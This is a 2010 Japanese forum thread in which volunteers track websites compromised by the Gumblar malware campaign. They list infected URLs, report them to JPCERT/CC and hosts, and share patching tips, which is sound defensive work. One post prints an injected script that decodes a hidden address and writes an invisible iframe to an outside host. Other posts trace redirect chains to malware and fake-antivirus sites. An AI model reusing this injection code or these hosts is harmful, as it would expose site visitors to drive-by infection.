user_data/packages/org/js/site.js infected with JS.Redirector.based.3
メル凸済み、反応待ち
0333327
2010/05/30(日) 11:22:33ん〜、確かに私がアクセス制御に引っかかった可能性はあるね。
とりあえず、流れをみるとサイト管理者の対応が糞らしいので、IE8のSmartScreenと、Firefox経由でGoogleSafeBlowsingに通報しておいた。
このまま放置されていれば、多分、数日中には赤くなるはず。 管理者は逆に青くなると思うが。(苦笑
0334316
2010/05/30(日) 11:38:41Last-Modified: Thu, 13 May 2010 11:14:38 GMT
Last-Modified: Thu, 13 May 2010 11:17:39 GMT
Last-Modified: Thu, 13 May 2010 11:18:05 GMT
Last-Modified: Thu, 13 May 2010 11:16:35 GMT
Last-Modified: Thu, 13 May 2010 11:17:49 GMT
>>324
> 2週間過ぎました
やほーは音沙汰無しでぷか。。。
0335八頭 ◆YAGApwSaEw
2010/05/30(日) 11:48:35K察庁経由で伝えてもらえ
0336コテハン ◆8080adndqg
2010/05/30(日) 11:59:26【陥落サイトのURL悪用厳禁】
adajo●namidaame●com
凸してくれてる人>乙です orz
0337名無しさん@お腹いっぱい。
2010/05/30(日) 13:54:27ここって宗教団体のようですね
ttp://www●itofound●or●jp/contents/aisatsu●html
当財団は、宗教法人真如苑開祖、故伊藤真乗大僧正の遺志を受け継ぎ…
真如苑 vol.75
http://gimpo.2ch.net/test/read.cgi/psy/1269487603/
0338名無しさん@お腹いっぱい。
2010/05/30(日) 14:19:30今回はyahooのトップページを開く分には大丈夫なんだろ?
0339名無しさん@お腹いっぱい。
2010/05/30(日) 14:53:27googleは既に赤くなってる。
http://safebrowsing.clients.google.com/safebrowsing/diagnostic?hl=ja&site=http://www.itofound.or.jp/
早く対応しないから...w
>>338
問題ない。懸賞のページから、>315のリンク先に飛ぶとアウトだったらしい。
0340コテハン ◆8080adndqg
2010/05/30(日) 18:33:32www●ooraka●com/
<TITLE>パソコン在宅ワーク・常識を超えたパソコン在宅ワーク!</TITLE>
マルウェアが勝手に仕事をしてくれるのが「常識を超えた」ということでしょうかネ?
以下、どーでも良いようなカスサイト
canyonhardware●com/
maillady●hirotu●net/
www●kireibast●sakura●ne●jp/exlwckaj
0341名無しさん@お腹いっぱい。
2010/05/30(日) 20:13:48www●ooraka●com/
メル凸済み、反応待ち
カスサイトやらは後でまとめてJPCERT/CCに通報しときます
ちょっと仕事が立て込んでるので
0343名無しさん@お腹いっぱい。
2010/05/31(月) 01:13:25d-pic●net :Forbidden
cgi●members●interq●or●jp/aquamarine/ruvi/ :Forbidden
www●garden-bank●com :aguse、Gred、Dr.Webともに反応せず
cowgirl●jp :閉鎖?
www●barakai●com :aguse、Gred、Dr.Webともに反応せず
www●allety●net :閉鎖?
ソース確認してません、暇してるよって方は精査して頂けると助かります
他はまだ駄目みたいなので明日にでも再凸…
>>340
カスサイトとやらをまとめてJPCERT/CCに報告しておきました
ていうかこれ、いつ終息するんでしょorz
0344名無しさん@お腹いっぱい。
2010/05/31(月) 01:18:56「Forbidden」はaguseGWで確認してます
0345コテハン ◆8080adndqg
2010/05/31(月) 11:55:44【陥落サイトのURL悪用厳禁】
www●jc-consulting●jp/houkoku_m/index3●html ←絶賛放置中(再再再再・・・晒し)
www●hdta●jp ←絶賛放置中
ayako●h00●jp ←うんこ対応中 ※<!--<script>-->
www●jyoho-review●jp/link/ ←絶賛放置中
www●jyoho-review●jp/item_list/ ←(゚д゚;)
d-pic●net/ ←トップページのみ閉鎖
d-pic●net/以下の階層は絶賛公開中
↓
www●google●co●jp/search?hl=ja&source=hp&q=site%3Ad-pic●net%2F
fps01●plala●or●jp/~zeiken/ ←絶賛放置中
neta-script●lionking●jp/2007/08/ ←絶賛放置中
0346コテハン ◆8080adndqg
2010/05/31(月) 12:28:32www●spiceheads.com/index●html
↓
最下部の8080以外に
<body link="#DB0000"〜中略〜<script type='text/javascript'>str="<vdepognbt src=" + unescape('%68%74%74%70・・・
↓
79●135●152●181/stats/go●php?sid=1
※直接踏んだらGoogleに飛ばされて終了orz
この前の<ijbwjuics src=←の後継かな?
0347名無しさん@お腹いっぱい。
2010/05/31(月) 12:38:43・つかえるネットからwww●cheesecake●co●jpのサービスを停止しましたとの連絡あり
www●i-keiei●jp :Forbidden
fps01●plala●or●jp/~zeiken :Forbidden
残りはもうしばらく静観
カスサイト、駄目くさいですがどうしたもんでしょう…
0348名無しさん@お腹いっぱい。
2010/05/31(月) 14:02:39いつもお世話さん
…なんだが、【陥落サイトのURL悪用厳禁】 って書くから悪用するヤツが増えるんじゃないか?
どうせ悪意のあるヤツは書いてもやるだろうし
それに「危険」って書いてあるボタンを押したくなるの法則
0349名無しさん@お腹いっぱい。
2010/05/31(月) 14:48:29> ご連絡、ありがとうございます。
> 当機構でも当該サイトの改ざんを確認しました。
> 改ざんが確認できたサイトの管理者宛てに、サイトが改ざんされている
> 旨の通告をしておきます。
2時間で返事が来たよ…仕事早いな
>>345
お疲れ様です
カスペルスキーがIflamerで検出、ついでにAviraに検体提出
>>346
さくらに通報しようと思ったらメルフォで蹴られた…何故に
他のは後でまとめて見ておきます
>>348
はずせないんじゃない?
過去にいちゃもんつけられてるし
0350名無しさん@お腹いっぱい。
2010/05/31(月) 15:13:10www●rokudai-ouen●com
0351名無しさん@お腹いっぱい。
2010/05/31(月) 15:28:03Last-Modified: Thu, 20 May 2010 02:42:03 GMT
0352名無しさん@お腹いっぱい。
2010/05/31(月) 17:37:11Gumblar.Xぽい
0353名無しさん@お腹いっぱい。
2010/05/31(月) 17:51:16www●ooraka●com :Forbidden
www●itofound●or●jp :aguse、Gred、Dr.Webともに反応なし/精査よろ
www●rokudai-ouen●com :Forbidden
0354名無しさん@お腹いっぱい。
2010/05/31(月) 17:53:070355名無しさん@お腹いっぱい。
2010/05/31(月) 17:55:36Gumblar.x確認
exeter-relatives-forum●org●uk/images/hnx5v/gifimg●php
↓
mariosflyingpizzaclearlake●com/images/appetizers●php
↓
latifkm●com/Css/templet11●php
↓
sexfunbeach●com/blogs/moms/wp-content/plugins/index●php
↓
asgardr●fr/memo/robots●php
↓
以後追跡不能
現時点では無害だけど、つーほーしたほうが良いと思う
0356名無しさん@お腹いっぱい。
2010/05/31(月) 19:36:180358名無しさん@お腹いっぱい。
2010/05/31(月) 20:54:21>www●jc-consulting●jp/houkoku_m/index3●html ←絶賛放置中(再再再再・・・晒し)
NTTPCコミュニケーションズに電凸
折り返しの電話があり、対応する旨の話しでした
0359コテハン ◆8080adndqg
2010/05/31(月) 21:09:32--
>>346に投下したspiceheads●comに装填されていた8080以外のコード
()<>/.,’”; ←を全角にしてありまつ
<script type=’text/javascript’>str=”<vdepognbt src=” + unescape
(’%68%74%74%70%3a%2f%2f%37%39%2e%31%33%35%2e%31%35%32%2e%31%38%31%2f%73%74%61%74%73%2f%67%6f%2e%70%68%70%3f%73%69%64%3d%31’)
+ ” Oaoz5=’1’vxoq5=’1’>”;str = str.replace(’vde’, ’i’);str =str.replace(’pog’, ’fr’);
str = str.replace(’nbt’, ’ame’);str =str.replace(’Oaoz5’, ’width’);
str =str.replace(’vxoq5’,’height’);document.write(str);</script>
--
microlines●lvって・・・
0360名無しさん@お腹いっぱい。
2010/05/31(月) 22:42:350361名無しさん@お腹いっぱい。
2010/05/31(月) 22:50:28.MSも見たな。
マイクロソフト…
0362名無しさん@お腹いっぱい。
2010/05/31(月) 23:10:43パーセントエンコードしたURLをデコード、「vdepognbt」を分割してreplaceで「iframe」に置換
今までのとは違う人が書いた物みたい
ガンブラーサイトを間貸ししてるのかも
0363名無しさん@お腹いっぱい。
2010/05/31(月) 23:27:46優秀すぎる
0364名無しさん@お腹いっぱい。
2010/05/31(月) 23:43:390365名無しさん@お腹いっぱい。
2010/05/31(月) 23:50:39MSE、AVIRAはちょっと検出、AVGは反応なしorz
変なサイトに飛ばされて、ウイルス仕込まれそうになった段階で反応するのかもしれないけど
0367名無しさん@お腹いっぱい。
2010/06/01(火) 00:15:05−8080系
ama●minasan●info/
anime●len2●net/
bentominowa●web●fc2●com/index_files/kotypeb_data/injection_graph_func●js
canyonhardware●com/
hirotu●net/hs/kyujin/maillady/index●htm
infom●biz/secretdiet/
kadaru●mydns●to/ →「ページを表示できないっぽいです(^^;」とあるが、ソースの下の方にスクリプト有り
kadaru●mydns●to/tauchi-office/taikensyugi/
kagaden●com/reiai/
kei●keita-house●com/torabaayu_kansai/
kumarin●biz/
neta-script●lionking●jp/2007/08/
nihon-support●jp/
population-japan●com
san●ron5●com/gbl/
temp●crossmarin●net/include/xoops●js
tenga●s155●coreserver●jp/
thismonky●com/
tw13●net
tw13●net/scratch/
tw13●net/vogue/vogue/index●html
www●adwalk●co●jp/
www●amakusaturigu●com
www●any-news●biz/
www●aoisys●com/nonstyle/
www●asu-job●com/
www●biz-x●jp
www●crossmarin●net/include/xoops●js
0368名無しさん@お腹いっぱい。
2010/06/01(火) 00:16:04www●gocha-mix●net/cgi-bin/blog/
www●hd-cre●com/ab-tz/
www●j-sports●or●jp
www●jc-consulting●jp/houkoku_m/index3●html
www●k3●dion●ne●jp/~sym1909/
www●k3●dion●ne●jp/~sym1909/hpbmapscript3●js
www●kireibast●sakura●ne●jp/exlwckaj/
www●marbell●jp/img2/photo/tenonaru/index●html
www●mfreep●com
www●nas-server●info/
www●ne●jp/asahi/sanya/sanpo
www●niaufuku●com/
www●niaufuku●com/sense_up/index●htm
www●nittoka●com/ →ソースの中央付近
www●oc-academy●com/taiken/wind●js
www●pommerland-herb●com/
www●ryu1●co●jp/
www●shinnippo●co●jp/ssff/2006hiroshima/
www●tec●ne●jp/
www●toutyann●com/
www●tu-han4●com/hatumo/
www●wood-sadoh●co●jp/classroom/index●html
www●y2-kco●com/bb-kn/
www12●plala●or●jp/atakashi/sk/
www13●plala●or●jp/metal-militia/
adajo●namidaame●com/ →途中で切れてる
nakaya-world●com/modules/bulletin →途中で切れてる
tukaoh●com →途中で切れてる
www●3ku●jp/grow_images/2005/june/index_2005june●html →途中で切れてる
0369名無しさん@お腹いっぱい。
2010/06/01(火) 00:17:04www●hdta●jp →途中で切れてる
www●seibidou●jp/products/information_sign/index●html →途中で切れてる
ayako●h00●jp →コメントアウト
butuda●f00●jp →コメントアウト
otokudou●h01●jp/ →コメントアウト
sunrise●2pg●in/ →コメントアウト
−Gumblar.x
ama●koukuujinja●net/vuitton/
doit●itabashido●com/seki/
jamur●jp/
mag●rdy●jp/
plot-office●com/
s1●shard●jp/syozyonudo/
saicho●co●jp/
truth-co●jp/
www●geocities●jp/tentacles344/hodokyo●html
www●kiyasuisan●co●jp/
−その他
winbet●tonosama●jp/
www●acl-music●jp/
www●aquaview●jp/
www●aquaview●jp/m_shop/index●html
www●aquaview●jp/q_a/index●html
www●ed-shop●com/
www●militarize●org/01●htm →ソースの最終行?
www●rctank●jp/ →ソースの最終行?
0370名無しさん@お腹いっぱい。
2010/06/01(火) 00:23:09315のサイトは、企画、運営が外注だろ。よくこれで、運営してるなと。
Yahooも、自前の懸賞の所に、感染したサイトがリンクされていても放置するのに、フィッシング対策にYahooツールバーを入れよう!と宣伝してるのは笑うわ。
0371名無しさん@お腹いっぱい。
2010/06/01(火) 00:31:50普通すぎるから激しい難読化より気付き難い(かもしれない)
0373コテハン ◆8080adndqg
2010/06/01(火) 00:38:40--
>>367-369 まとめ乙です。
>>358 乙です。
so-netさんが4連発w
止まらぬサイト改ざん(1) ISPがガンブラー対策〜パスワードリセット敢行も
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2248
止まらぬサイト改ざん(2)「怪しい薬局」に続き「怪しい時計屋キャンペーン」も
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2249
止まらぬサイト改ざん(3)「負の連鎖」を断ち切る「3つの基本対策」実施を
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2250
止まらぬサイト改ざん(4)訪問の心あたりはありませんか〜新規告知サイト13件
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2251
サイト復旧後、「告知無し」のカスサイトを晒すスレが必要かな?
0375名無しさん@お腹いっぱい。
2010/06/01(火) 01:27:51so-netから>>280に連絡があったそうです(so-net
こっそり修正しているようですが告知しないのかと聞いたところ
改竄された事実はないとのお言葉でした
ぶちぎれましたね、私はw
会話を録音しているとかで私を警察に訴えるとのこと
この団体をことわざで例えるなら、【逝ってよし】ですかねw
0376名無しさん@お腹いっぱい。
2010/06/01(火) 01:29:130377名無しさん@お腹いっぱい。
2010/06/01(火) 01:31:10たぶんまた改ざんされるんじゃないかな
それでも事実はないと言い張りそうだけど
0378316
2010/06/01(火) 01:43:29あぁー。。。
>>280のアドレスで具具れば魚醤がでるのでもしものときのために(ry
so-netにはフォームと鯖缶宛にめるして対応の返事があったんだけど、
そんなことになってたとは…(告知のことを>>373のセキュリティニュースから引用してます>>14)
0379名無しさん@お腹いっぱい。
2010/06/01(火) 05:38:170380名無しさん@お腹いっぱい。
2010/06/01(火) 09:33:08www●sutoband●org
0381名無しさん@お腹いっぱい。
2010/06/01(火) 10:13:34とりあえずブログに改ざんされている箇所とIPAのアド書いておいたww
JPCERT/CC通報済み
てか、うちの選挙区の人orz
0382名無しさん@お腹いっぱい。
2010/06/01(火) 11:50:27さすが民主党議員はテロ行為に余念がない。
0383名無しさん@お腹いっぱい。
2010/06/01(火) 12:03:29その前に何か忘れてませんか
0384名無しさん@お腹いっぱい。
2010/06/01(火) 14:32:13>会話を録音しているとかで私を警察に訴えるとのこと
so-netと話をしたで始まって、この団体は・・・で結んでるところが少しよくわからない
今後どうすれば訴えるって?それともいきなり警察に相談しますって?
本当なんだとしたらわけわからん
告知の責任を果たさない法人晒しスレのテンプレをマジメに検討した方がいい
0385名無しさん@お腹いっぱい。
2010/06/01(火) 14:38:170386コテハン ◆8080adndqg
2010/06/01(火) 20:01:46vaxponys●sakura●ne●jp/hukin-goods●vaxponys●com/
■当サイトのウィルス感染に関するお詫びとお願い
www.i-keiei.jp/2010/05/post_26.html
修正後、告知しないカスサイトは見習ってほしいぞ・・と。
0387名無しさん@お腹いっぱい。
2010/06/01(火) 21:12:04さくらインターネットに通報しました
>修正後、告知しないカスサイトは見習ってほしい
まったくですね
0388名無しさん@お腹いっぱい。
2010/06/01(火) 21:15:43404になってますね
0389名無しさん@お腹いっぱい。
2010/06/01(火) 21:35:11いや逆でしょww
しかし子ども手当・・・みんなに配った麻生さんと比べて不公平感があるし
財政的にも借金して配るという、地域振興券を遥かに超える究極的愚策ですな
といってもガンブラー仕掛けちゃいけませんよ^^
0390名無しさん@お腹いっぱい。
2010/06/01(火) 21:44:12キャッシュはまだ検出する
0391名無しさん@お腹いっぱい。
2010/06/01(火) 21:48:47gredで不正改ざん
0392名無しさん@お腹いっぱい。
2010/06/01(火) 22:03:35aimeblog●com/だとしたらドメイン自体が真っ黒
もともとウイルス配布サイトだからこのスレとは関係ないよ
改ざんではなくて元からそういうサイトなの
どっかのスレにあったならNG登録しといたほうがいいよ
0393名無しさん@お腹いっぱい。
2010/06/01(火) 22:05:29はずなんだけどな
0394名無しさん@お腹いっぱい。
2010/06/01(火) 22:06:250395名無しさん@お腹いっぱい。
2010/06/01(火) 22:10:39http://smith.rowiki.jp/domain/?help
0396名無しさん@お腹いっぱい。
2010/06/01(火) 22:11:260397名無しさん@お腹いっぱい。
2010/06/01(火) 23:04:46http://blog.goo.ne.jp/sutoband/e/14cddcd36fbbc009e5c543ee6f8cb38c
>>このHPのようにアクセスが数百程度のHPも脅威の対象かな?
自称危機管理専門家なのに(笑) 大手とか関係ないぞ
こんな認識のヤツは頼むから運用しないでくれよ
0398名無しさん@お腹いっぱい。
2010/06/01(火) 23:16:11どんどん悪化してきているような気がする…
0400名無しさん@お腹いっぱい。
2010/06/02(水) 00:42:06削除依頼出すのはいいけど、セキュ板実質管理者居ないから、
他のスレのとまとめて長期未処理スレに報告したほうがいいと思う
まとめて出してくるわ
0402名無しさん@お腹いっぱい。
2010/06/02(水) 10:22:03そうなんだよなぁ
こちらは感染しない対策をしてればいいんだが
そういう問題でもないからなあ、被害総額はどのくらいなのだろうか
そもそも感染しない対策すら知らない人が多そうだし
0403名無しさん@お腹いっぱい。
2010/06/02(水) 11:50:36自分は2chをやらなかったらGunblerも対策も知らなかったよ
対策の仕方を読んでもいまだによくわからないし
被害と言うのはGunblerを踏んで何かを流出させた人だけではなくて
Gunblerを踏んでしまってクリーンインストールをしなければならない手間や
Gunblerを仕込まれてしまってサイトを直さねばらない手間や費用も
被害と言えば被害だよね
0404コテハン ◆8080adndqg
2010/06/02(水) 12:36:35永遠に終わらないような気が・・orz
【陥落サイトのURL悪用厳禁】
www●goshikionsen●net/access
www●fashion389●com/datsushien
■本日の目玉商品w
<!--ショッピングサイト(トロイ付)構築を行っております-->
eccube●jp/
↓見本ページ(やっぱりトロイ付)↓
eccube●jp/demo/
0405名無しさん@お腹いっぱい。
2010/06/02(水) 13:08:27> 対策の仕方を読んでもいまだによくわからないし
これは問題だろ
どこがわからんのかkwsk
なんとなくわからんとか理解する気がないとかじゃなく文章ちゃんと読んで
どこがわからんのか教えてくれ
0406名無しさん@お腹いっぱい。
2010/06/02(水) 15:00:52vaxponys●sakura●ne●jp/hukin-goods●vaxponys●com/ :再凸済み
>>367-369
一通りチェックが終了したので、昨日付けでJPCERTに報告しました
これだけの数、何処までやってくれるか判りませんけどね
>>404
www●goshikionsen●net
www●fashion389●com/datsushien/
eccube●jp
JPCERT/CCに報告しました
0407名無しさん@お腹いっぱい。
2010/06/02(水) 15:30:20j-sportsは今日付けで変更されてるページをいくつか確認
とりあえず修正したのかもしれない
再改ざんの可能性もあるので要観察かな
TOPがこんなかんじで1時間前くらい
Last-Modified: Wed, 02 Jun 2010 05:10:14 GMT
0408名無しさん@お腹いっぱい。
2010/06/02(水) 15:36:53こんなに頻出してたら大変だろうに
0409名無しさん@お腹いっぱい。
2010/06/02(水) 15:44:02http://www.virustotal.com/jp/analisis/567823945ead442c75e4d3a54949a8044e7210b3c3a23ac85edda85a10955829-1275460764
祝 全スルー
0410名無しさん@お腹いっぱい。
2010/06/02(水) 15:50:00していれば、ISPの対処のスピードも上がるでしょう。
デジロックみたいな所が、だらだらとやっている位ですから、何もやっていないでしょうね。
0411名無しさん@お腹いっぱい。
2010/06/02(水) 15:56:27・windows update
とにかく最新にしとけ、XP sp2の人もまだいるみたいだから
その場合はカスタム更新で
・Adobe Reader
要らん場合はインストールすんな
・Adobe ReaderのAcrobat JavaScript
>>4のとおり
・JRE(Java Runtime Environment)を最新版に更新する
要らん場合はインストールすんな
プリインストールされてる場合はアンインストール後にCCleanerで掃除
・Flash Playerを最新版に更新する
バージョンチェックはしておこう
・QuickTimeを最新版に更新する
alternativeでおk、ブラウザにプラグインなんか入れんな
0412名無しさん@お腹いっぱい。
2010/06/02(水) 17:00:19社団法人情報通信設備協会 関東地方本部
0413名無しさん@お腹いっぱい。
2010/06/02(水) 17:05:46遂にお会い出来ましたね、com:8080さん
0415名無しさん@お腹いっぱい。
2010/06/02(水) 17:18:21fun●s331●xrea●com/ikeacat/r●js
sale●s334●xrea●com/?p=127
bara●s317●xrea●com/
sakura●s316●xrea●com/?p=136
ps2●s307●xrea●com/?p=135
www●tctv●ne●jp/s-pato/tyuuka●html
sijoanna●finito●fc2●com/
meringue●s48●xrea●com/pm/2004/04/
toko72●s289●xrea●com/adhocmart●com/renaiunaphuusui/
elesty●s25●xrea●com/s-album/kie-album-39●htm
soverign●s154●xrea●com/
0416コテハン ◆8080adndqg
2010/06/02(水) 17:41:14↓禿のキャッシュ↓
cache●yahoofs●jp/search/cache?p=site%3Aeccube●jp%2F&search●x=&fr=top_ga1_sa&tid=top_ga1_sa&ei=UTF-8&aq=&oq=&u=eccube.jp/&w=eccube+●jp&d=Ku2UhO8_U3HZ&icp=1&●intl=jp
0417名無しさん@お腹いっぱい。
2010/06/02(水) 17:45:18IPAやJPCERTやセキュmemoを見ていないんだろうなぁ。
0418名無しさん@お腹いっぱい。
2010/06/02(水) 17:51:360419名無しさん@お腹いっぱい。
2010/06/02(水) 17:59:37今回は魚拓をとってから電凸したのであつた
魚拓e ccube.jp/
http://megalodon.jp/2010-0602-1708-18/eccube.jp/
0420名無しさん@お腹いっぱい。
2010/06/02(水) 17:59:50エロゲの公式さいとなんですけど
0421名無しさん@お腹いっぱい。
2010/06/02(水) 18:00:56たぶんはい
0422名無しさん@お腹いっぱい。
2010/06/02(水) 18:05:29公式にいかないと修正パッチがあてられない・・・orz
リンク先のページもチェックするにチェックを入れなかった時は安全ですと言われたんですけど
ちょっとぐらいのぞいても大丈夫ですよね
0423名無しさん@お腹いっぱい。
2010/06/02(水) 18:07:04>プリインストールされてる場合はアンインストール後にCCleanerで掃除
ここがよくわからん
コントロールパネルから消してjava6:20以外どこにも無いのに外部ソフトウェアが必要なの?
0424名無しさん@お腹いっぱい。
2010/06/02(水) 18:08:27GJ
0425名無しさん@お腹いっぱい。
2010/06/02(水) 18:11:29修正パッチなんて配布支援サイトを探せばいいじゃない
とりあえずブランド名plz
0426名無しさん@お腹いっぱい。
2010/06/02(水) 18:13:07祝福のカンパネラです
0427名無しさん@お腹いっぱい。
2010/06/02(水) 18:13:510428名無しさん@お腹いっぱい。
2010/06/02(水) 18:28:13それって無関係かもしれんよ
www●google●co●jp/search?hl=ja&q=site%3Akanto●itca●or●jp%2F
www●google●co●jp/search?q=site%3Akanto●itca●or●jp%2Fwic%2F
0429名無しさん@お腹いっぱい。
2010/06/02(水) 18:42:38ごめん。まだ見てたらURLを加工して貼ってくれ
感染箇所を見つけられない‥。
もし黒ならアニメ化するってのにorz
0430名無しさん@お腹いっぱい。
2010/06/02(水) 18:48:05avast! 4.8の100602-0の定義ファイルで踏んでみたがなんともないような
さらっとソースと.jsも見たがそれっぽいのが見当たらないな
セキュソフトはなに?
0431名無しさん@お腹いっぱい。
2010/06/02(水) 18:50:580432名無しさん@お腹いっぱい。
2010/06/02(水) 18:51:14工作板の本スレ>>1にある上から二番目のURLです
URL貼り方はこうでいいですか?
windmill●suki●jp/product/campanella/
0433名無しさん@お腹いっぱい。
2010/06/02(水) 18:56:03白だとおも
0434名無しさん@お腹いっぱい。
2010/06/02(水) 18:56:26あちこち確認しながら見てたら時間が…
ソースには特に変なものはなかったです、Dr.Webも反応しませんでした
Gredもhtmlはシロ判定を返してるみたいですし大丈夫かと
というか、Gredが修正パッチを誤検出してるっぽいです
VTではシロ判定http://www.virustotal.com/jp/analisis/012b338f69d323de3cce45cf289f3b7fcf7b2b19dab7d264872e3c05dbc96075-1275470513
exe絡みだとスレ違いだし、まぁこんな回答しか返せませんけど良いですか?
0435名無しさん@お腹いっぱい。
2010/06/02(水) 18:59:27何事も無かったようでほっとしました!
お二人ともご親切にありがとうざいました
0436名無しさん@お腹いっぱい。
2010/06/02(水) 19:00:11http://mirror1.lapistan.jp:8000/mirror/windmill/mod/campanella_voice.exe
の:8080を誤検知したとかってオチだとおも
0437名無しさん@お腹いっぱい。
2010/06/02(水) 19:25:490438名無しさん@お腹いっぱい。
2010/06/02(水) 20:02:18大丈夫でしょうか?荒らし酷いな
0439名無しさん@お腹いっぱい。
2010/06/02(水) 20:08:35専ブラ使えばレス見てわかるとおもうんで専ブラ導入推奨
0440名無しさん@お腹いっぱい。
2010/06/02(水) 20:33:46処理早いのは良いことなんですけどね 告知できればなお良
>>419
17:08時点では修正済みでは? 感染時ソースの魚拓↓
http://megalodon.jp/2010-0602-416-03/www.dan.co.uk/viewsource/index.php?url=http%3A%2F%2Feccube.jp%2Findex.html
外部.jsの場合、自分は魚拓を表示できないので
ピリオドをパーセントエンコードするか、JSUNPACKのレポートにして欲しいです↓
http://megalodon.jp/2010-0601-1513-45/www.dan.co.uk/viewsource/index.php?url=http://www.sutoband.org/js/scroll_news%2Ejs
http://jsunpack.jeek.org/dec/go?report=6bfc48ba1e492f69a3c1f52e5d873eee2e4a7924
0441名無しさん@お腹いっぱい。
2010/06/02(水) 21:27:53サイトが乗っ取られてみたいです
0442名無しさん@お腹いっぱい。
2010/06/02(水) 21:33:50アンインストール後にJREの残骸が残ることがあるかもしれないので
念のためにCCleanerでレジストリを調べておくといいかもしれないということ
0443名無しさん@お腹いっぱい。
2010/06/02(水) 22:35:24http://megalodon.jp/2010-0602-2208-14/www.dan.co.uk/viewsource/index.php?url=http%3A%2F%2Fkanto.itca.or.jp%2Fwic%2Fattachment%2F97%2Fstyle%252Ecss
Last-Modified: Wed, 06 Aug 2008 18:40:52 GMT
2008年に乗っ取られたのがガンブラーのおかげで発覚したのか
0444名無しさん@お腹いっぱい。
2010/06/03(木) 00:50:13いつ踏んだんですか?とりあえず一週間ほど前に対策とられたみたいなので、
ここ数日の事であれば大丈夫ですよ。
0445名無しさん@お腹いっぱい。
2010/06/03(木) 04:53:57www●mypersonalhttp●com:8080 ← ここに行って
goscanfor●com ←ここに飛ばされ
microsoft●msn●com●chimen●info ←ここでFakeAVの実演販売
Google先生も怒ってます
0446名無しさん@お腹いっぱい。
2010/06/03(木) 05:01:18gred先生は「このサイトは安全です」とな(ダメじゃん)
0447名無しさん@お腹いっぱい。
2010/06/03(木) 07:27:53大元は[社団法人 情報通信設備協会]http://itca.or.jpで
ttp://itca.or.jp/kanto/ が ttp://tkanto.itca.or.jp/ に転送される
http://www.google.com/search?q=http://itca.or.jp/kanto/wic/attachment/97/&num=50
2年前からコメントスパム配信基地だった
0448447
2010/06/03(木) 07:40:47○トラックバックスパム
0449名無しさん@お腹いっぱい。
2010/06/03(木) 08:40:58げぇ……レジストリまで探らないといけないのか
そんなのここに初めて来たばかりのPCに疎い人とかにさせたら
重要なの消して悲惨な事になりそうだ
そこまで徹底的にしないと対策が不十分と言われるんじゃ
未だにガンブラー広がってるのも納得
広がってるスピードや広がってる対象(政府関連、ウェブ業者関連)がおかしいとは思うけど
0450名無しさん@お腹いっぱい。
2010/06/03(木) 10:03:19ECCUBE.JPの訂正
http://megalodon.jp/2010-0602-1455-03/www.dan.co.uk/viewsource/index.php?url=http%3A%2F%2Feccube.jp%2Findex.html
0451名無しさん@お腹いっぱい。
2010/06/03(木) 10:39:09www●cowtv●jp/channel/student/index●php
0452名無しさん@お腹いっぱい。
2010/06/03(木) 11:19:37大阪デジタルコンテンツビジネス創出協議会
世界へ優れたコンテンツ…じゃなくてウィルス発信中
0453名無しさん@お腹いっぱい。
2010/06/03(木) 11:25:24どちらもすごいですね 凸完
0454名無しさん@お腹いっぱい。
2010/06/03(木) 13:16:370455コテハン ◆8080adndqg
2010/06/03(木) 14:45:53www●ktm-ktm●com/tomoko ←途中切れ
www●w-ouen●com/i/machi ←未対応
www●kyotoclub-ilias●net/m/ ←電話用
www●triskelionpublishing●net/index●html ←途中切れ
www●giuglianoweb●com ←途中切れ
gpindy●com/ ←電話用
www●haisui●com/ec/html/
netgames●kirara●st/netgames
d07●mobair●info
www●suit-order●com ←絶賛放置中
park17●wakwak●com/~bayside/URANAI/R/ALLSITE/main●html
get-motorcycle●com/
【本日の(ry
infotop777●com/detail●php?id=style1198741395
↓ページ内の[Click Here!]を押した先↓
okuo2●cyberinfostation●jp/ ←\(^o^)/
0456名無しさん@お腹いっぱい。
2010/06/03(木) 16:16:14d07●mobair●info
www●suit-order●com
park17●wakwak●com/~bayside/URANAI/R/ALLSITE/main●html
get-motorcycle●com/
infotop777●com/detail●php?id=style1198741395
okuo2●cyberinfostation●jp/
鯖屋とJPCERT連絡完了。
0457名無しさん@お腹いっぱい。
2010/06/03(木) 16:20:15共有SSLだしGoogleにキャッシュされてるし、胡散臭い
http://www.google.com/search?q=site%3Aserver08.instantssl.co.jp%2F&num=50
0458名無しさん@お腹いっぱい。
2010/06/03(木) 17:32:51鳥肌実公式サイトが…
0459名無しさん@お腹いっぱい。
2010/06/03(木) 19:22:51社団法人情報通信設備協会 関東地方本部
知らせたのにお礼のメールもなし。告知もなし。
こんな団体がセキュリティを語るな!
また、ページのTopにゴルフコンペの案内ってどんな温い団体なんだよ。
蓮舫 次はここをバッサリ切ってくれ
0460名無しさん@お腹いっぱい。
2010/06/03(木) 19:42:53そこ、さっき電凸しました
分かる者が不在だから明日掛け直してくれといってました
今日は無理なんじゃないの?
0461名無しさん@お腹いっぱい。
2010/06/03(木) 19:45:32kanto●itca●or●jp/ はフィッシングサイトかも
0462名無しさん@お腹いっぱい。
2010/06/03(木) 20:33:540463名無しさん@お腹いっぱい。
2010/06/03(木) 21:07:14>>443の時点で改竄されていたattachment/97/以下が404
Yahoo!のキャッシュにもガンブラーはないみたい
http://siteexplorer.search.yahoo.co.jp/advsearch?p=http%3A%2F%2Fkanto.itca.or.jp%2Fwic%2Fattachment%2F97%2F
http://siteexplorer.search.yahoo.co.jp/advsearch?p=http%3A%2F%2Fitca.or.jp%2Fkanto%2Fwic%2Fattachment%2F97%2F
0464名無しさん@お腹いっぱい。
2010/06/03(木) 22:48:48いったいどんなスクリプトが?
0465名無しさん@お腹いっぱい。
2010/06/03(木) 23:38:59感染時のソースの魚拓。
http://megalodon.jp/2010-0602-1729-08/www.dan.co.uk/viewsource/index.php?url=http%3A%2F%2Fkanto.itca.or.jp%2Fwic%2Fattachment%2F97%2Fresource-218.html
</head><body><script>〜
飛び先が.com:8080。珍しくAVGが反応した
0466316
2010/06/04(金) 00:18:26Last-Modified: Sat, 29 May 2010 14:27:16 GMT : http://megalodon.jp/2010-0603-2338-58/www.dan.co.uk/viewsource/index.php?url=http%3A%2F%2Fwww.torihada.com%2Fjava%2FAC_RunActiveContent%2Ejs
Last-Modified: Sat, 29 May 2010 14:27:33 GMT : http://megalodon.jp/2010-0603-2340-15/www.dan.co.uk/viewsource/index.php?url=http%3A%2F%2Fwww%2Etorihada%2Ecom%2Fjava%2Fneweindow%2Ejs
